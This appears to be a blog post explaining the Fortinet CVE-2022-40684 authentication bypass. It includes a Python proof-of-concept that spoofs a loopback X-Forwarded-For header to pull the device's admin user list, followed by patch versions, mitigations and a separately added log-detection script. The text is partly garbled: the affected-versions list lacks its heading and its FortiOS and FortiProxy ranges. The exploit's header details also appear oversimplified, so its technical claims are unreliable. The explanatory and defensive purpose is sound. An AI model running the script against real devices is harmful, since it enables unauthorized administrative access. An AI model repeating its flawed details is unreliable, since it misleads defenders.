If you use Fortinet appliances, particularly FortiOS, FortiProxy, or FortiSwitchManager, you may have heard about a big security issue called CVE-2022-40684. This bug was a serious authentication bypass [CWE-288], allowing attackers to get through the admin interface with nothing more than specially crafted HTTP(S) requests. Below, we break down the exploit in simple terms, with code, links, and real-world advice.

FortiSwitchManager: version 7.2.0, and 7.0.0 to 7.0.6

What did it allow?  
An attacker didn’t need a password. They could fool the device by sending HTTP(S) requests in a certain way, making it act like the attacker was already logged in as an administrator.

How the Exploit Works

The bug involves HTTP requests: attackers found that by adding a special header (such as X-Forwarded-For), they could trick the Fortinet firmware into believing they were a trusted user.

- Send an HTTP(S) request with a “magic” header (e.g., X-Forwarded-For: 127.0.0.1)
- The device thinks the request comes from “localhost” (itself) and grants admin access, with no password

Example Exploit Code (Python)

Here’s a simple Python script that leverages the vulnerability to fetch system configuration.

Note: This is for educational/detection purposes only! Do not use it to hack others.

import requests

target = "https://<fortinet-device-ip>:<port>"  # Replace with the real address
headers = {
    "X-Forwarded-For": "127.0.0.1",
    "User-Agent": "Mozilla/5.0"
}
try:
    # Try to get the system admin user list
    resp = requests.get(target + "/api/v2/cmdb/system/admin", headers=headers, verify=False)
    if resp.status_code == 200:
        print("[+] Vulnerable! Got admin users:")
        print(resp.text)
    else:
        print("[-] Not vulnerable or protected. Status:", resp.status_code)
except Exception as e:
    print("Error:", e)

Proof of Exploit in the Wild

There are now Metasploit modules and public scripts available. Attackers have actively scanned for this, and in October 2022, Fortinet began warning customers through its official advisory.

How Do You Prevent This?

1. Update Right Away

- FortiOS: 7.2.2+
- FortiProxy: 7.2.1+ / 7.0.7+
- FortiSwitchManager: 7.2.1+ / 7.0.7+

2. Disable Remote Management  
Restrict admin interfaces to local IPs only (block WAN).

3. Monitor for Exploit Attempts  
Look for odd requests in your logs, especially with the X-Forwarded-For: 127.0.0.1 header.
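To act on the monitoring advice above, here is an added example (not from the original post or from Fortinet) that scans request logs for the tell-tale pattern: a client that is not itself on loopback asserting a loopback address through a forwarding header. The JSON-lines log format is an assumption made for the example, and it also checks the standard Forwarded header, which goes beyond the X-Forwarded-For header the post describes.

```python
import ipaddress
import json
import re

# Constructed sample log (one JSON object per request) as a reverse proxy or
# WAF in front of the management interface might write it. This schema is an
# assumption for the example, not Fortinet's own log format.
SAMPLE_LOG = """
{"src": "203.0.113.7", "method": "GET", "path": "/api/v2/cmdb/system/admin", "headers": {"X-Forwarded-For": "127.0.0.1", "User-Agent": "Mozilla/5.0"}}
{"src": "192.0.2.10", "method": "GET", "path": "/login", "headers": {"User-Agent": "Mozilla/5.0"}}
{"src": "198.51.100.4", "method": "PUT", "path": "/api/v2/cmdb/system/admin/admin", "headers": {"Forwarded": "for=\\"[127.0.0.1]:8000\\""}}
{"src": "127.0.0.1", "method": "GET", "path": "/api/v2/monitor/system/status", "headers": {"X-Forwarded-For": "127.0.0.1"}}
{"src": "10.0.0.5", "method": "GET", "path": "/api/v2/cmdb/system/admin", "headers": {"X-Forwarded-For": "10.0.0.5, 10.0.0.1"}}
"""

# Headers through which a client can claim a different origin address.
FORWARDING_HEADERS = ("x-forwarded-for", "forwarded")


def claimed_addresses(headers):
    """Yield every IP address asserted by a forwarding header (names matched case-insensitively)."""
    for name, value in headers.items():
        if name.lower() not in FORWARDING_HEADERS:
            continue
        # Handles "a, b, c" lists and RFC 7239 tokens such as for="[127.0.0.1]:8000";
        # anything that is not a parseable address (ports, key names) is skipped.
        for token in re.findall(r"[0-9a-fA-F:.]+", value):
            try:
                yield ipaddress.ip_address(token)
            except ValueError:
                pass


def is_suspicious(entry):
    """True when a non-loopback client claims a loopback address: the spoof this post describes."""
    if ipaddress.ip_address(entry["src"]).is_loopback:
        return False  # genuinely local traffic may legitimately carry a loopback address
    return any(addr.is_loopback for addr in claimed_addresses(entry.get("headers", {})))


def scan_log(text):
    """Return (src, method, path) for every suspicious request in a JSON-lines log."""
    hits = []
    for line in filter(str.strip, text.splitlines()):
        entry = json.loads(line)
        if is_suspicious(entry):
            hits.append((entry["src"], entry["method"], entry["path"]))
    return hits


if __name__ == "__main__":
    for src, method, path in scan_log(SAMPLE_LOG):
        print(f"[ALERT] {src} {method} {path}: forwarding header claims a loopback address")
```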

References & Further Reading

- Official Fortinet Advisory: FG-IR-22-377
- Horizon3ai PoC and Analysis
- Rapid7 Disclosures & Analysis
- Metasploit Module

Timeline

Published on: 10/18/2022 14:15:00 UTC
Last modified on: 10/20/2022 19:06:00 UTC